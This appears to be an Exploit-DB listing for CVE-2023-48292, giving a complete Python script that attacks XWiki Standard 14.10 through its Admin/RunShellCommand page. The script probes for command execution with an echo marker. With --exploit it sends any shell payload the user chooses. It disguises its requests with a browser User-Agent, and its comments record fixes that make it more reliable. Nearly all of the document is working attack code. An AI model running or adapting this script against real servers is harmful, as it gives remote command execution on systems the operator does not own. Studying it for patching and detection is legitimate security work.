
XWiki Standard 14.10 - Remote Code Execution (RCE)

Published 29 Mar 2025 — reported by Mehran Seifalinia — type: exploitdb (source: www.exploit-db.com)

CVE-2023-48292 allows remote code execution on XWiki Standard 14.10 through the `Admin/RunShellCommand` wiki page, which this script drives via its `command` query parameter; the proof of concept was tested on Ubuntu 20.04 LTS. Note that the script sends no credentials, so the probe only works where that page is reachable without an administrator session.

Code
# Exploit Title: CVE-2023-48292 Remote Code Execution Exploit
# Google Dork: N/A
# Date: 23 March 2025
# Exploit Author: Mehran Seifalinia
# Vendor Homepage: https://www.xwiki.org/
# Software Link: https://www.xwiki.org/xwiki/bin/view/Download/
# Version: XWiki Standard 14.10
# Tested on: Ubuntu 20.04 LTS with OpenJDK 11
# CVE : CVE-2023-48292

import logging
import sys
from argparse import ArgumentParser
from urllib.parse import urlparse

import validators
from requests import get, post, RequestException

# Constants
CVE_NAME: str = "CVE-2023-48292"  # advisory identifier shown in the CLI description

# Browser-like User-Agent sent with every request (presumably so the probe does
# not show up as the default python-requests UA in the target's access logs).
HEADERS: dict[str, str] = {
    "User-Agent": (
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
        "(KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
    ),
}

# Configure logging
def setup_logging(logfile: str) -> None:
    """Send INFO-and-above log records to both stdout and *logfile*.

    Handlers are attached to the root logger, which is what the module-level
    ``logging.info(...)`` calls in this script write to. Calling this more
    than once attaches a second pair of handlers, so records would then be
    emitted twice.

    Args:
        logfile: Path of the log file; opened in append mode by FileHandler.
    """
    line_format = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
    root = logging.getLogger()
    root.setLevel(logging.INFO)

    # One handler per sink (console first, then file); both share the same
    # timestamped line format.
    for handler in (logging.StreamHandler(sys.stdout), logging.FileHandler(logfile)):
        handler.setFormatter(line_format)
        root.addHandler(handler)

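def validate_url(url: str) -> str:
    """Validate *url* and return it without a trailing slash.

    Only absolute ``http://`` / ``https://`` URLs with a host part are
    accepted, which is exactly what the error message has always promised.
    The check uses the standard library instead of ``validators.url`` so the
    accepted schemes match the message and lab targets such as bare IP:port
    pairs or single-label hostnames are not subject to the third-party
    validator's public-hostname rules (which may reject them).

    Args:
        url: Target base URL as given on the command line.

    Returns:
        The URL with any trailing ``/`` removed, so callers can append
        ``/xwiki/...`` with a single slash.

    Raises:
        SystemExit: exit status 1, after logging an error, when the URL is
            not an absolute http(s) URL.
    """
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        logging.error("Invalid target URL format. It must start with 'http://' or 'https://'.")
        sys.exit(1)
    return url.rstrip("/")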

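def check_vulnerability(target_url: str, method: str, *, timeout: float = 30.0) -> bool:
    """Probe ``Admin/RunShellCommand`` on *target_url* with a harmless echo.

    The command is handed to requests via ``params=`` so it is percent-encoded
    properly (the previous f-string interpolation broke on ``&``, ``#`` or
    ``%`` in the command). The probe is written as ``'test''test''test1234'``
    so the marker string exists in the response only if a shell actually
    concatenated and echoed it: a page that merely reflects the submitted
    ``command`` parameter (a pre-filled form field, or presumably a login
    redirect that carries the original URL) is no longer reported as
    vulnerable.

    No credentials are sent, so the probe can only succeed where that page is
    reachable as an anonymous user — NOTE(review): confirm against the
    advisory whether a normally configured target requires an administrator
    session for this page.

    Args:
        target_url: Base URL without trailing slash (see ``validate_url``).
        method: ``"GET"`` or ``"POST"``; any other value falls through to
            POST, as before.
        timeout: Seconds to wait for connect/read before giving up; without
            it a silently dropped connection would hang the script forever.

    Returns:
        True when the response status is 200 and the body contains the
        echoed marker, False otherwise.

    Raises:
        SystemExit: exit status 1, after logging, on any requests error
            (including a timeout).
    """
    marker = "testtesttest1234"
    # Adjacent single-quoted words concatenate in sh, so the marker never
    # appears verbatim in the request itself.
    probe_command = "echo 'test''test''test1234'"
    vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand"
    params = {"command": probe_command}
    try:
        if method == "GET":
            response = get(vulnerable_url, headers=HEADERS, params=params, timeout=timeout)
        else:  # method == "POST"
            response = post(vulnerable_url, headers=HEADERS, params=params, timeout=timeout)
    except RequestException as error:
        logging.error(f"HTTP Request Error: {error}")
        sys.exit(1)

    if response.status_code == 200 and marker in response.text:
        logging.info("Target is vulnerable! Command execution test succeeded.")
        return True
    logging.info("Target does not appear to be vulnerable.")
    return False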

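def perform_attack(target_url: str, payload: str, method: str, *, timeout: float = 30.0) -> None:
    """Send *payload* as the ``command`` parameter of ``Admin/RunShellCommand``.

    The payload is passed via ``params=`` so requests percent-encodes it; the
    previous f-string interpolation truncated or split any payload containing
    ``#``, ``&`` or ``%``. For POST the parameter still travels in the query
    string, exactly as before. No credentials are sent.

    A 200 response is logged as "Attack successful!", but note that 200 only
    means the page answered — it is not proof the command ran (a login page
    or the unchanged form would also return 200).

    Args:
        target_url: Base URL without trailing slash (see ``validate_url``).
        payload: Shell command string to submit.
        method: ``"GET"`` or ``"POST"``; any other value falls through to
            POST, as before.
        timeout: Seconds to wait for connect/read before giving up.

    Raises:
        SystemExit: exit status 1, after logging, on any requests error
            (including a timeout).
    """
    logging.info(f"Attempting attack with payload: {payload}")
    vulnerable_url = f"{target_url}/xwiki/bin/view/Admin/RunShellCommand"
    params = {"command": payload}
    try:
        if method == "GET":
            response = get(vulnerable_url, headers=HEADERS, params=params, timeout=timeout)
        else:  # method == "POST"
            response = post(vulnerable_url, headers=HEADERS, params=params, timeout=timeout)
    except RequestException as error:
        logging.error(f"HTTP Request Error: {error}")
        sys.exit(1)

    if response.status_code == 200:
        # Only a snippet of the body is logged; the full page may be large.
        logging.info(f"Attack successful! Response: {response.text[:100]}...")
    else:
        logging.warning("Attack attempt failed.")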

def main() -> None:
    """CLI entry point: parse arguments, probe the target, optionally exploit.

    Without ``--exploit`` the script only reports whether the probe succeeded;
    with it, ``--payload`` is sent after a positive probe. A negative probe
    ends the run with a warning.
    """
    parser = ArgumentParser(description=f"{CVE_NAME} Exploit Script")
    parser.add_argument("target", help="Target URL (e.g., https://vulnsite.com)")
    parser.add_argument("--exploit", action="store_true", help="Perform attack with a payload")
    parser.add_argument("--payload", default="echo 'testtesttest1234'", help="Custom payload for exploitation")
    parser.add_argument("--method", choices=["GET", "POST"], default="GET", help="HTTP method to use (GET or POST)")
    parser.add_argument("--logfile", default="exploit.log", help="Log file to store results")
    args = parser.parse_args()

    setup_logging(args.logfile)  # console + file sinks on the root logger
    target_url = validate_url(args.target)  # exits on a malformed URL

    logging.info("Checking the target for vulnerability...")
    if not check_vulnerability(target_url, args.method):
        logging.warning("The target is not vulnerable. Exiting.")
        return

    if not args.exploit:
        logging.info("Run with '--exploit' to attempt the attack.")
        return

    perform_attack(target_url, args.payload, args.method)

if __name__ == "__main__":
    # Script entry point; importing this module does not run the exploit.
    main()

Scores (as of 29 Mar 2025): Vulners AI Score 9.4 (high risk); CVSS 3.1 range 8.8–9.6; EPSS 0.22938; 281 views.